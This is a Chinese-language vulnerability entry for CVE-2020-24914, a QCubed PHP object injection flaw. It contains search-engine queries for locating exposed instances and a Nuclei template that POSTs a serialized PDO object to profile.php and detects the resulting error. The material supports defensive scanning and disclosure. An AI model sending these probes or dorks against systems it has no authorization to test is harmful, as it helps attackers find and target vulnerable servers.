QCubed PHP Object Injection Vulnerability

漏洞信息

漏洞名称: QCubed PHP Object Injection Vulnerability

漏洞编号:

  • CVE: CVE-2020-24914

漏洞类型: 反序列化

漏洞等级: 严重

漏洞描述: QCubed是一个开源的PHP框架,用于快速开发数据库驱动的Web应用程序。它广泛应用于各种Web开发项目中,提供了一个丰富的组件库和强大的数据模型功能。该框架的3.1.1版本及之前的所有版本中存在一个PHP对象注入漏洞,这是由于在profile.php文件中反序列化不受信任的POST数据所导致的。攻击者可以通过构造恶意的POST请求,利用此漏洞在服务器上执行任意PHP代码,从而可能导致系统完全被控制。此漏洞的技术根源在于不安全的反序列化操作,即未对用户输入进行适当的验证和清理,直接将其反序列化。这种漏洞的利用不需要任何形式的身份验证,攻击者可以远程利用此漏洞,对受影响的系统造成严重的安全威胁,包括但不限于数据泄露、服务中断以及进一步的系统入侵。

产品厂商: qcubed

产品名称: qcubed

影响版本: 3.1.1

搜索语法: http.html:”QCubed” || http.html:”qcubed”

来源: https://github.com/projectdiscovery/nuclei-templates/blob/571628f3459047c154d698fc1e079f727a6bdec5/http%2Fcves%2F2020%2FCVE-2020-24914.yaml

类型: projectdiscovery/nuclei-templates:github issues

POC详情

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56

id: CVE-2020-24914

info:
  name: QCubed 3.1.1 - PHP Object Injection
  author: riteshs4hu
  severity: critical
  description: |
    QCubed 3.1.1 and all versions contain a PHP object injection vulnerability caused by unserializing untrusted POST data in profile.php, allowing unauthenticated attackers to execute arbitrary code via crafted POST requests.
  impact: |
    Successful exploitation allows unauthenticated attackers to execute arbitrary PHP code on the server, potentially leading to complete system compromise.
  remediation: |
    Update QCubed to the latest version that addresses this vulnerability or implement proper input validation and sanitization.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2020-24914
    - https://seclists.org/fulldisclosure/2021/Mar/28
    - https://tech.feedyourhead.at/content/QCubed-PHP-Object-Injection-CVE-2020-24914
    - https://owasp.org/www-community/vulnerabilities/PHP_Object_Injection
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2020-24914
    cwe-id: CWE-502
    cpe: cpe:2.3:a:qcubed:qcubed:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: qcubed
    product: qcubed
    shodan-query: 'http.html:"QCubed" || http.html:"qcubed"'
    fofa-query: 'body="QCubed" || body="qcubed"'
  tags: cve,cve2020,qcubed,rce,deserialization

http:
  - method: POST
    path:
      - "{{BaseURL}}/vendor/qcubed/qcubed/assets/php/profile.php"
    headers:
      Content-Type: application/x-www-form-urlencoded
    body: "intDatabaseIndex=1&strReferrer=test&strProfileData=TzozOiJQRE8iOjA6e30%3d"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "You cannot serialize or unserialize PDO instances"
          - "PDOException"
        condition: or

      - type: status
        status:
          - 200
          - 500